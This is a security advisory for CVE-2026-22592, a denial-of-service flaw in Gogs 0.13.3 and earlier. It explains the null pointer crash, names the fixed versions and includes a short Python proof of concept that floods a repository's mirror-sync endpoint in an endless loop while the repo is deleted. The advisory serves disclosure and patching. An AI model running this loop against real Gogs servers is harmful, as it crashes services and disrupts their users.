CVE-2026-22592: Gogs is Vulnerable to Denial of Service
Summary An authenticated user can cause a DOS attack. If one of the repo files is deleted before synchronization, it will cause the application to crash.
Details If GetMirrorByRepoID fails, the error log dereferencing null pointer. This happens if the repository no longer exits. https://github.com/gogs/gogs/blob/4cc83c498b6ae59356a04912d68a932165bad5e6/internal/database/mirror.go#L333-L337 if err != nil m is alwasa nil https://github.com/gogs/gogs/blob/4cc83c498b6ae59356a04912d68a932165bad5e6/internal/database/mirror.go#L269-L278 PoC Spam mirror-sync on repo and delete this repo code python spam mirror-sync py import requests
url = "http://gogs.lan:3000/superuser/gobypass403/settings" headers = { "Cookie": "lang=en-US; ilikegogs=fe32281ab84ae868; csrf=UCw6xvqR-L7YLBMPjujwjywxy8s6MTc2NDc3NDQ2NDE1MzU5ODQ3Mg", }
data = { "csrf": "UCw6xvqR-L7YLBMPjujwjywxy8s6MTc2NDc3NDQ2NDE1MzU5ODQ3Mg", "action": "mirror-sync", }
while True: print("syncing") response = requests.post(url, headers=headers, data=data) Impact Denial of Service server crash.
Other sources
Gogs is an open source self-hosted Git service. In version 0.13.3 and prior, an authenticated user can cause a DOS attack. If one of the repo files is deleted before synchronization, it will cause the application to crash. This issue has been patched in versions 0.13.4 and 0.14.0+dev.
— MITRE
Affected Software
Event History
Frequently Asked Questions
What is the severity of CVE-2026-22592?
CVE-2026-22592 has a severity rating that indicates it poses a potential Denial of Service risk due to its ability to crash the application.
How do I fix CVE-2026-22592?
To fix CVE-2026-22592, upgrade Gogs to version 0.13.4 or later.
What causes the Denial of Service in CVE-2026-22592?
The Denial of Service in CVE-2026-22592 is caused when an authenticated user deletes a repo file before synchronization, leading to a null pointer dereference.
Which versions of Gogs are affected by CVE-2026-22592?
Gogs versions up to and including 0.13.3 are affected by CVE-2026-22592.
Is authentication required to exploit CVE-2026-22592?
Yes, an authenticated user is required to exploit the vulnerability described in CVE-2026-22592.